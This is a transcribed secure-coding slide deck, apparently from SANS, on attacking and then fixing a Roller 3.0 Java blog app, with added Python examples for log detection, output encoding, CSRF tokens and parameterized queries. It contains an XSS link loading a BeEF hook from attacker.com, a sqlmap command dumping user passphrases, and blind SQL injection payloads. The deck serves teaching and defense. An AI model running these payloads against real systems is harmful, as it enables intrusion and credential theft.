
Securing Java EE Web Apps



  1. Securing Java EE Web Apps
     - Frank Kim
     - Principal, ThinkSec
     - Author, SANS Institute
  2. About
     - Frank Kim
       - Consultant, ThinkSec
       - Author, SANS Secure Coding in Java/JEE
       - SANS Application Security Curriculum Lead
  3. What You Should Know
     - Hacking is not hard
     - Don’t trust any data
       - Assume that your users are evil!
  4. Outline
     - Web App Attack Refresher
       - XSS, CSRF, SQL Injection
     - Testing
       - Hacking an open source app
     - Secure Coding
       - Fixing security bugs
  5. Cross-Site Scripting (XSS)
     - Occurs when unvalidated data is displayed back to the browser
     - Types of XSS
       - Stored
       - Reflected
       - Document Object Model (DOM) based
  6. Cross-Site Request Forgery (CSRF)
  7. SQL Injection (SQLi)
     - Occurs when dynamic SQL queries are used
       - By injecting arbitrary SQL commands, attackers can extend the meaning of the original query
       - Can potentially execute any SQL statement on the database
     - Very powerful
       - #1 on CWE/SANS Top 25 Most Dangerous Software Errors
       - #1 on OWASP Top 10
  8. Outline
     - Web App Attack Refresher
       - XSS, CSRF, SQL Injection
     - Testing
       - Hacking an open source app
     - Secure Coding
       - Fixing security bugs
  9. What are We Testing?
     - Installation of Roller 3.0
     - Fake install of SANS AppSec Street Fighter Blog
     - Want to simulate the actions that a real attacker might take
       - There are definitely other avenues of attack
       - We're walking through one attack scenario
  10. Attack Scenario
     - XSS to control the victim's browser
     - Combine XSS and CSRF to conduct a privilege escalation attack
       - Use escalated privileges to access another feature
     - Use SQL Injection to access the database directly
  11. Spot the Vuln - XSS
  12. XSS in head.jsp
  13. Testing the "look" Param
     - Admin pages include head.jsp
     - The param is persistent for the session
  14. XSS Exploitation
     - Introducing BeEF
       - Browser Exploitation Framework
       - http://www.bindshell.net/tools/beef
     - Uses XSS to hook the victim's browser
       - Log user keystrokes, view browsing history, execute JavaScript, etc
       - Advanced attacks - Metasploit integration, browser exploits, etc
  15. XSS Exploitation Overview (diagram: Attacker and Victim)
     1) Attacker sends link with evil BeEF script:
        http://localhost:8080/roller/roller-ui/yourWebsites.do?look="><script src="http://www.attacker.com/beef/hook/beefmagic.js.php"></script>
     2) Victim clicks evil link
     3) Victim's browser sends data to attacker
  16. BeEF XSS Demo
  17. Spot the Vuln - CSRF
  18. CSRF in UserAdmin.jsp
     - Want to use CSRF to change this field
  19. CSRF Demo
  20. Spot the Vuln - SQL Injection
  21. SQL Injection in UserServlet
  22. SQL Injection Testing
     - UserServlet is vulnerable to SQLi
       - http://localhost:8080/roller/roller-ui/authoring/user
     (screenshot: "No results")
  23. Exploiting SQL Injection
     - Introducing sqlmap
       - http://sqlmap.sourceforge.net
     - Tool that automates detection and exploitation of SQL Injection vulns
       - Supports MySQL, Oracle, PostgreSQL, MS SQL Server
       - Supports blind, inband, and batch queries
       - Fingerprint/enumeration - dump db schemas, tables/column names, data, db users, etc
       - Takeover features - read/upload files, exec arbitrary commands, exec Metasploit shellcode, etc
  24. sqlmap Syntax
     - Dump userids and passwords
         python sqlmap.py
           -u "http://localhost:8080/roller/roller-ui/authoring/user?startsWith=f%25"
           --cookie "username=test; JSESSIONID=<INSERT HERE>"
           --drop-set-cookie -p startsWith
           --dump -T rolleruser -C username,passphrase -v 2
  25. SQL Injection Demo
  26. How it Works
     - f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy
     - f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 104 AND 'neEy' LIKE 'neEy
     - f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 105 AND 'neEy' LIKE 'neEy
  27. Step By Step [0]
     - SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1;
       returns ilovethetajmahal
  28. Step By Step [1]
     - select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1);
       returns i
     - select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1);
       returns l
     - select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1);
       returns o
  29. Step By Step [2]
     - select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1));
       returns 105
     - select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1));
       returns 108
     - select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1));
       returns 111
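The three Step By Step slides show what a single boolean-based probe computes. From the defender's side the same probes leave a recognisable trail in the web server's access log: one source hitting one parameter repeatedly with an ORD(MID(...)) comparison whose threshold changes from request to request, which is the footprint of a character-by-character search. The Python below is an added example, not from the slides or from Roller; the log lines are constructed, and the indicator regexes are assumptions keyed on the payload shape the slides show.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, quote, urlsplit

# Constructed sample data (not from the page): the three probes mirror the
# ORD(MID(...)) > N comparisons on the "How it Works" slide, URL-encoded as a
# client would send them; the last two requests are ordinary traffic.
PROBE = ("f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), "
         "CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > {n} "
         "AND 'neEy' LIKE 'neEy")
USER_PATH = "/roller/roller-ui/authoring/user"


def log_line(ip, ts, target, status, size):
    """Build one Common Log Format line (constructed)."""
    return f'{ip} - - [{ts}] "GET {target} HTTP/1.1" {status} {size}'


SAMPLE_LOG = [
    log_line("10.0.0.5", f"01/Jan/2012:10:00:0{i} +0000",
             f"{USER_PATH}?startsWith={quote(PROBE.format(n=n), safe='')}", 200, 512)
    for i, n in enumerate((103, 104, 105), start=1)
] + [
    log_line("10.0.0.7", "01/Jan/2012:10:00:04 +0000", f"{USER_PATH}?startsWith=fr", 200, 1024),
    log_line("10.0.0.7", "01/Jan/2012:10:00:05 +0000", "/roller/roller-ui/theme/basic/colors.css", 200, 2048),
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$')

# Indicators of boolean-based blind extraction (assumed patterns), name + regex.
INDICATORS = [
    ("char-compare", re.compile(r"\b(?:ORD|ASCII)\s*\(\s*(?:MID|SUBSTR(?:ING)?)\s*\(", re.I)),
    ("subselect", re.compile(r"\(\s*SELECT\b", re.I)),
    # the closing trick: AND 'x' LIKE 'x   (second quote supplied by the app's own SQL)
    ("tautology-tail", re.compile(r"\bAND\s+'([^']*)'\s+LIKE\s+'\1", re.I)),
]
THRESHOLD_RE = re.compile(r"\)\s*>\s*(\d+)")


def parse_line(line):
    """Return (ip, path, {param: decoded value}) or None for an unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return m["ip"], parts.path, params


def classify_value(value):
    """Names of the indicators present in one decoded parameter value."""
    return [name for name, rx in INDICATORS if rx.search(value)]


def analyze(lines, min_probes=3):
    """Correlate probes per (ip, path, param) and flag sources whose comparison
    threshold changes across requests: that is what a binary search looks like."""
    probes = defaultdict(list)
    benign = 0
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, path, params = parsed
        hit = False
        for param, value in params.items():
            names = classify_value(value)
            if names:
                hit = True
                tm = THRESHOLD_RE.search(value)
                probes[(ip, path, param)].append((names, int(tm.group(1)) if tm else None))
        if not hit:
            benign += 1
    flagged = []
    for (ip, path, param), hits in probes.items():
        thresholds = [t for _, t in hits if t is not None]
        if len(hits) >= min_probes and len(set(thresholds)) > 1:
            flagged.append({"ip": ip, "path": path, "param": param, "probes": len(hits),
                            "thresholds": thresholds,
                            "indicators": sorted({n for names, _ in hits for n in names})})
    return {"flagged": flagged, "benign_requests": benign}


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG)["flagged"]:
        print(finding)
```

Run as a script it prints one finding for 10.0.0.5 against the startsWith parameter with thresholds 103, 104, 105. The correlation step matters more than the regexes: a single probe can be a false positive, but a run of them from one source with a moving threshold is not.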
  30. Attack Summary
     - XSS to control the victim's browser
     - Combine XSS and CSRF to conduct a privilege escalation attack
       - Use escalated privileges to access another feature
     - Use SQL Injection to access the database directly
  31. Outline
     - Web App Attack Refresher
       - XSS, CSRF, SQL Injection
     - Testing
       - Hacking an open source app
     - Secure Coding
       - Fixing security bugs
  32. Data Validation (diagram)
     - Inbound data -> Validation -> Application ("Should I be consuming this?")
     - Application -> Encoding -> Outbound data ("Should I be emitting this?")
     - Data store: data going out to it is encoded, data coming back from it is validated
  33. Output Encoding
     - Encoding
       - Convert characters so they are treated as data and not special characters
     - Must escape differently depending where data is displayed on the page
     - XSS Prevention Cheat Sheet
       - http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
  34. Fix XSS in head.jsp
     - Add URL encoding
         <link rel="stylesheet" type="text/css" media="all" href="<%= request.getContextPath() %>/roller-ui/theme/<%= ESAPI.encoder().encodeForURL(theme) %>/colors.css" />
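Why the fix picks URL encoding rather than HTML encoding is the "must escape differently depending where" point from the previous slide. The Python below is an added illustration, not from the slides, Roller or ESAPI: it mirrors the head.jsp link line, renders it with an unencoded and a URL-encoded theme value, and runs the result through Python's HTML parser to show which tags a browser would see. The theme value is a constructed payload of the same shape as the look parameter, with a placeholder host; encode_for_url_path stands in for ESAPI.encoder().encodeForURL.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Constructed attacker-style theme value (same shape as the slide's "look"
# payload, placeholder host): it tries to close the href attribute and open
# a script element.
EVIL_THEME = '"><script src="http://attacker.example/hook.js"></script>'
CONTEXT_PATH = "/roller"


def encode_for_url_path(value):
    """Percent-encode a value that lands inside a URL path segment (the role
    ESAPI's encodeForURL plays in the fix): only unreserved characters survive."""
    return quote(value, safe="")


def encode_for_html_attr(value):
    """Entity-encode a value for an HTML attribute context."""
    return html.escape(value, quote=True)


def render_head(theme, encoder=None):
    """Mirror the head.jsp <link> line. encoder=None reproduces the vulnerable
    version; pass encode_for_url_path for the fixed one."""
    shown = theme if encoder is None else encoder(theme)
    return (f'<link rel="stylesheet" type="text/css" media="all" '
            f'href="{CONTEXT_PATH}/roller-ui/theme/{shown}/colors.css" />')


class TagCollector(HTMLParser):
    """Record every start tag and every href value, as a browser would parse them."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, value in attrs:
            if name == "href":
                self.hrefs.append(value)


def tags_in(markup):
    """Return (list of start tags, list of href values) found in markup."""
    p = TagCollector()
    p.feed(markup)
    p.close()
    return p.tags, p.hrefs


if __name__ == "__main__":
    for label, enc in (("unencoded", None), ("url-encoded", encode_for_url_path),
                       ("attr-encoded", encode_for_html_attr)):
        tags, hrefs = tags_in(render_head(EVIL_THEME, enc))
        print(f"{label:13} tags={tags} href={hrefs[0]!r}")
```

The unencoded render yields two elements, link and script; the URL-encoded render yields only the link, and its href contains no quote or angle bracket at all. Attribute encoding also keeps the markup to one element, but the parser decodes the entities back into the href, so the browser would request a URL containing the raw characters: the encoding has to match the context the data is emitted into, not merely prevent a tag from forming.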
  35. Fix CSRF
     - UserAdmin.jsp
       - Add anti-CSRF token
         <input type="hidden" name="<%= CSRFTokenUtil.SESSION_ATTR_KEY %>" value="<%= CSRFTokenUtil.getToken(request.getSession(false)) %>">
     - UserAdminAction.java
       - Check anti-CSRF token
         if (!CSRFTokenUtil.isValid(req.getSession(false), req)) {
             return mapping.findForward("error");
         }
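The slide shows where the token is emitted and where it is checked but not what CSRFTokenUtil does. The Python below is an added sketch of that shape, not Roller's Java code: the session is a plain dict, SESSION_ATTR_KEY is an assumed name, get_token mints a random per-session token on first use, and is_valid compares in constant time and fails closed when there is no session, no submitted token, or a token that does not match.

```python
import hmac
import secrets

# Assumed attribute name; the slide's JSP uses CSRFTokenUtil.SESSION_ATTR_KEY for
# both the session attribute and the hidden field, so the two names coincide.
SESSION_ATTR_KEY = "csrf_token"


def get_token(session):
    """Return the session's anti-CSRF token, minting one on first use.
    A missing session (getSession(false) returned null) is a programming error:
    a state-changing form must never be rendered without one."""
    if session is None:
        raise ValueError("no session: cannot issue a CSRF token")
    token = session.get(SESSION_ATTR_KEY)
    if token is None:
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        session[SESSION_ATTR_KEY] = token
    return token


def is_valid(session, request_params):
    """True only when the request carries the token stored in this session."""
    if session is None:
        return False
    expected = session.get(SESSION_ATTR_KEY)
    submitted = request_params.get(SESSION_ATTR_KEY)
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)  # constant-time comparison


def hidden_field(session):
    """The hidden input the legitimate form page renders server-side."""
    return f'<input type="hidden" name="{SESSION_ATTR_KEY}" value="{get_token(session)}">'


def user_admin_action(session, params):
    """Mirror UserAdminAction: validate before touching any state."""
    if not is_valid(session, params):
        return "error"
    # ... the privilege change would be applied here ...
    return "success"


def simulate():
    """Legitimate submission versus forged requests riding the victim's session."""
    victim_session = {}
    # The victim's browser loaded the real form, so it has the token to echo back.
    legit = {"userName": "alice", "userAdmin": "true", SESSION_ATTR_KEY: get_token(victim_session)}
    # A cross-site page can make the browser send the session cookie, but it
    # cannot read the victim's page, so it has no token, or only a guess.
    forged = {"userName": "alice", "userAdmin": "true"}
    guessed = dict(forged, **{SESSION_ATTR_KEY: secrets.token_urlsafe(32)})
    return {
        "legit": user_admin_action(victim_session, legit),
        "forged": user_admin_action(victim_session, forged),
        "guessed": user_admin_action(victim_session, guessed),
        "no_session": user_admin_action(None, legit),
    }


if __name__ == "__main__":
    print(simulate())
```

The token is bound to the session, so it must be regenerated whenever the session is (for instance at login); reusing a token across a session change would let a token captured from an earlier, anonymous session pass the check after authentication.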
  36. Fix SQL Injection
     - Use parameterized queries correctly
         if (startsWith == null || startsWith.equals("")) {
             query = "SELECT username, emailaddress FROM rolleruser";
             stmt = con.prepareStatement(query);
         } else {
             query = "SELECT username, emailaddress FROM rolleruser "
                   + "WHERE username like ? or emailaddress like ?";
             stmt = con.prepareStatement(query);
             stmt.setString(1, startsWith + "%");
             stmt.setString(2, startsWith + "%");
         }
         rs = stmt.executeQuery();
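To see the fix do its work, the Python/sqlite3 example below (added here; not Roller's code) puts the concatenated query shape next to the slide's parameterized version and runs both against a constructed rolleruser table. The malicious input reuses the slide's closing trick (a quote followed by a tautology that the application's own trailing quote completes). It also goes one step beyond the slide: a placeholder stops injection, but the % and _ wildcards in the user's input still reach LIKE, so the last function escapes them as well.

```python
import sqlite3


def setup_db():
    """In-memory stand-in for Roller's rolleruser table with constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE rolleruser (username TEXT, emailaddress TEXT, passphrase TEXT)")
    con.executemany("INSERT INTO rolleruser VALUES (?, ?, ?)", [
        ("admin", "admin@example.org", "constructed-1"),
        ("frank", "frank@example.org", "constructed-2"),
        ("fiona", "fiona@example.org", "constructed-3"),
        ("bob_smith", "bob@example.org", "constructed-4"),
    ])
    return con


def find_users_vulnerable(con, starts_with):
    """Reconstruction of the pre-fix shape: the parameter is glued into the SQL,
    so a quote in it ends the literal and the rest becomes part of the query."""
    if not starts_with:
        query = "SELECT username, emailaddress FROM rolleruser"
    else:
        query = ("SELECT username, emailaddress FROM rolleruser WHERE username like '"
                 + starts_with + "%' or emailaddress like '" + starts_with + "%'")
    return [row[0] for row in con.execute(query)]


def find_users_fixed(con, starts_with):
    """The slide's fix: placeholders carry the value, the query shape is constant."""
    if not starts_with:
        return [row[0] for row in con.execute("SELECT username, emailaddress FROM rolleruser")]
    query = ("SELECT username, emailaddress FROM rolleruser "
             "WHERE username like ? or emailaddress like ?")
    pattern = starts_with + "%"
    return [row[0] for row in con.execute(query, (pattern, pattern))]


def escape_like(value):
    """Escape LIKE metacharacters so they match literally (escape char is backslash)."""
    return value.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def find_users_fixed_no_wildcards(con, starts_with):
    """Beyond the slide: parameterized *and* wildcard-safe, so a user cannot turn
    a prefix search into a dump of every row by sending '%'."""
    if not starts_with:
        return find_users_fixed(con, "")
    query = ("SELECT username, emailaddress FROM rolleruser "
             "WHERE username like ? ESCAPE '\\' or emailaddress like ? ESCAPE '\\'")
    pattern = escape_like(starts_with) + "%"
    return [row[0] for row in con.execute(query, (pattern, pattern))]


if __name__ == "__main__":
    con = setup_db()
    tautology = "x%' OR 'a' LIKE 'a"   # constructed: same closing trick as the slide's payloads
    print("vulnerable, tautology:", find_users_vulnerable(con, tautology))
    print("fixed, tautology:     ", find_users_fixed(con, tautology))
    print("fixed, '%':           ", find_users_fixed(con, "%"))
    print("fixed+escape, '%':    ", find_users_fixed_no_wildcards(con, "%"))
```

With the tautology input the concatenated version returns every user while the parameterized one returns nothing, because the whole string is now compared as a literal prefix. The third and fourth lines show the residual issue: a bare % still returns every row from the parameterized query, and only the ESCAPE variant treats it as the character it is.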
  37. Building Secure Software (Source: Microsoft SDL)
  38. Remember
     - Hacking is not hard
     - Don’t trust any data
       - Validate input
         - Prefer whitelists
         - Use authenticity token
       - Encode output
         - Contextual encoding
         - Use parameterized queries
  39. SANS Software Security
     - SANS AppSec 2012
       - April 30 - May 1 in Las Vegas
       - CFP is open now!
       - http://sans.org/appsec-2012
     - New courses
       - DEV551 Secure iOS Development
       - DEV568 Secure Android Development
     - Free resources
       - Top 25, blog, white papers, webcasts, and more at
       - http://software-security.sans.org
     - Discount
       - Save 10% using the discount code DEVOXX. Enterprise pricing avail.
  40. Thanks!
     - Frank Kim
     - [email_address] @sansappsec
